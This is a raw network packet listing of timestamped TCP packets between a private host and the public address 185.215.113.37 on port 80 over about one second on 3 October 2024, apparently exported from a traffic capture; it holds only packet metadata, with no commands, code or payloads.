Oct 3, 2024 21:36:11.810185909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810219049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.810230970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.810401917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810415983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810431004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810442924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.810453892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810463905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.810477018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810494900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810501099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.810514927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810523987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.810539961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.810548067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810559988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.810584068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.810955048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810969114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810982943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.810997009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811006069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811018944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811037064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811043024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811055899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811064959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811077118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811088085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811098099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811110973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811121941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811134100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811142921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811157942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811167002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811189890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811706066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811719894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811733961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811748028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811758041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811768055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811780930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811795950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811804056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.811825991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.811841011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.853600025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853622913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853638887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853655100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853674889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.853692055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853705883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.853717089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853729010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.853741884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853789091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.853789091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.853809118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853832960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853851080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.853858948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853869915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.853882074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853893042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.853909016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.853920937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.853948116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.854037046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854078054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.854186058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854202032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854229927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.854243040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.854311943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854326010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854342937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854367971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.854394913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.854562998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854578018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854593039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854609966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854621887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.854649067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.854829073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854844093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854857922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.854871035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.854892969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855073929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855087996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855103016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855117083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855130911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855142117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855159044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855165958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855176926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855189085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855201960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855221987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855700016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855714083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855727911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855742931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855751991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855763912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855775118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855788946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855799913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855813026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855822086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855834961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855843067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855859041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855865955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855880976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855889082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855906010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.855916977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855937004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.855947971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.856607914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856621981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856636047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856650114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856662989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.856673956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856687069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.856697083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856710911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856720924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.856733084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.856740952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856749058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.856762886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856776953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856791973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856801987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.856817007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.856825113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.856841087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.856858969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.857487917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.857501984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.857516050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.857531071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.857542038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.857553005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.857568026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.857575893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.857584953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.857599020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.857608080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.857628107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.857636929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.857650042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.857664108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.857690096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.857708931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.858244896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.858258963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.858273029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.858287096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.858299971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.858310938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.858328104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.858335018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.858345032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.858359098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.858369112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.858390093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.895442009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.895477057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.895494938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.895512104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.895525932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.895544052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.895550966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.895565033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.895581007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.895590067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.895601988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.895632029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.895788908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.895863056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.895878077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.895906925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.895937920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.895958900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.895998955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896158934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896208048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896219015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896234035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896258116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896287918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896414042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896429062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896442890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896455050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896466970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896476984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896519899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896831989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896846056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896859884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896873951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896888971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896898031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896913052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896919012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896930933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896940947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896958113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896965027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.896975994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.896989107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.897003889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.897022963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.897469044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.897484064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.897531033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.897635937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.897650003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.897664070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.897681952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.897689104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.897702932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.897711992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.897725105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.897743940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.897749901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.897762060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.897794008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.898221970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.898235083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.898247957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.898262024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.898272038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.898286104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.898293972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.898305893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.898320913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.898329020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.898350000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.898375034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.946235895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946276903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946291924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.946316004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946321964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.946352959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.946440935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946455002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946470976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946486950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946497917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.946508884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.946533918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.946749926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946763992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946778059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946791887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.946803093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.946813107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.946834087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.947211981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947227001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947241068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947251081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.947266102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.947273970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947283983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.947297096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947309017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.947319984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947329998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.947343111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947352886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.947365999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947375059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.947396994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947412014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947431087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.947438002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.947453022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.947474957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.948158979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948173046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948188066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948199034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.948211908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948229074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.948241949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948256016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948270082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948280096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.948292971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.948302031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948316097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.948324919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948338032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.948350906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948363066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.948374033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.948384047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.948406935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949172974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949187994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949201107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949213028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949228048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949234009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949242115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949259043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949265003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949278116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949290991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949301004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949310064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949322939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949337959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949347019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949359894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949371099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949383020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949394941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949408054 CEST	49704	80	192.168.2.5	185.215.113.37
